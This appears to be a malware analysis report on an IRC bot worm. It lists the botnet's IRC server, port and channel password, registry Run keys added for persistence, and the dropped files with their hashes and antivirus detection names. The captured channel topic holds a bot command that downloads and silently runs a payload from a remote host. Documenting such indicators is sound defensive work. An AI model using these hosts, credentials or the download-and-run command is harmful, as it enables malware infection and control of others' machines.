Remote Host Port Number
ns2.statsfind.com 8080
PASS yesyes
NICK [luk]434946
USER asgpqdg 0 0 :[luk]434946
USERHOST [luk]434946
MODE [luk]434946 +x
JOIN #lucky enigma
NICK [luk]163529
USER zklylx 0 0 :[luk]163529
USERHOST [luk]163529
MODE [luk]163529 +x
NICK [luk]820442
USER uikxju 0 0 :[luk]820442
USERHOST [luk]820442
MODE [luk]820442 +x
NICK [luk]956318
USER vqffpa 0 0 :[luk]956318
USERHOST [luk]956318
MODE [luk]956318 +x
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
o HKEY_CURRENT_USERSoftwareMicrosoftOLE
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ outlook = “%ProgramFiles%outlookoutlook.exe /auto”
+ winlog = “winlog.exe”
so that outlook.exe runs every time Windows starts
so that winlog.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices]
+ winlog = “winlog.exe”
so that winlog.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftOLE]
+ winlog = “winlog.exe”
File System Modifications
* The following files were created in the system:
1 %ProgramFiles%outlookoutlook.exe
%ProgramFiles%outlookv.tmp
[file and pathname of the sample #1] 210 432 bytes MD5: 0xB420A430D733A3A1D8B27E71F78590E1
SHA-1: 0xBB26160E4D6E64EDBE85E2B00A4884936AD624CA W32.IRCBot [Symantec]
P2P-Worm.Win32.VB.dw [Kaspersky Lab]
W32/Alcan.worm!p2p [McAfee]
W32/VB-YY [Sophos]
Worm:Win32/Alcan.D [Microsoft]
P2P-Worm.Win32.VB [Ikarus]
Win-Trojan/Dropper.210432 [AhnLab]
packed with UPX [Kaspersky Lab]
2 %ProgramFiles%outlookp.zip 202 477 bytes MD5: 0x7062B446762BB09FF093B2F84DC5D6A8
SHA-1: 0x197500A5C19F42ACE816A4E13B009FF7B03F426D W32.IRCBot [Symantec]
P2P-Worm.Win32.VB.dw [Kaspersky Lab]
P2P-Worm.Win32.VB [Ikarus]
3 %System%bszip.dll 62 464 bytes MD5: 0x077AEE101ADCF2421A1F3E616F79FFDB
SHA-1: 0xBCC7D956C46B73A59FD699B6B567E3BB0F052536 (not available)
4 %System%cmd.com
%System%netstat.com
%System%ping.com
%System%regedit.com
%System%taskkill.com
%System%tasklist.com
%System%tracert.com 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709 (not available)
5 %System%winlog.exe 175 104 bytes MD5: 0x67BBD86D8C9970DCACEA2DD611A37022
SHA-1: 0x51C4013AA2AB9D2F4D1ED83695FCD5C4901C9F37 W32.Spybot.Worm [Symantec]
Backdoor.Win32.EggDrop.v [Kaspersky Lab]
W32/Gaobot.worm.gen.u [McAfee]
WORM_GAOBOT.DF [Trend Micro]
W32/Rbot-CGS [Sophos]
Backdoor:Win32/Rbot [Microsoft]
Trojan-Downloader.Win32.QQHelper [Ikarus]
Win32/IRCBot.worm.variant [AhnLab]
packed with SDProtector [Kaspersky Lab]
Resolved : [ns2.statsfind.com] To [66.249.4.38]
Now talking in #lucky
Topic On: [ #lucky ] [ .dl http://ns2.thebuisness.com/main1.gif winsi.exe 1 -s ]
Topic On: [ #lucky ] [ .dc ]
ChanMode: Connecting.. sets mode [+smntu]
Modes On: [ #lucky ] [ +smntu ]